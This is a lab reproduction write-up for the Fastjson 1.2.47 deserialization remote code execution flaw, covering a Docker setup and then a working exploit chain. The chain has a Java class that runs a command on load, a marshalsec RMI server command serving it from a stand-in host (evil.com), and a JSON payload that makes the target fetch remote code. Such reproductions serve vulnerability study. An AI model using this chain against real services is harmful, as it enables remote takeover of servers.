### Vulnerability Key Information #### Vulnerability Description - **Vulnerability Type**: Fastjson 1.2.47 Deserialization Remote Code Execution (RCE) - **Affected Versions**: Fastjson 1.2.47 and earlier versions. - **Root Cause**: The deserialization whitelist mechanism in Fastjson versions prior to 1.2.48 has a flaw, allowing attackers to bypass it and execute arbitrary commands. #### Environment Setup - Use Docker Compose to start a Spring project using Fastjson 1.2.45. - Access `http://your-ip:8090` to view the returned JSON object. ```markdown Command: docker compose up -d ``` #### Vulnerability Reproduction - **Target Environment**: openjdk:8u102. Due to the absence of the `com.sun.jndi.rmi.object.trustURLCodebase` restriction, RMI command execution is possible. - **Steps**: 1. Compile and upload command execution code, such as `TouchFile.class`. 2. Start an RMI server using the Marshalsec project. 3. Send a malicious payload to the target server. ```java // TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = { "touch", "/tmp/success" }; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } } // Start RMI server java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999 ``` ```json // Payload { "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://evil.com:9999/Exploit", "autoCommit": true } } ``` #### Impact and Practical Verification - Successfully executed the `touch /tmp/success` command, verifying the exploitation of the RCE vulnerability. - Additional exploitation techniques can be found in JNDI injection-related resources.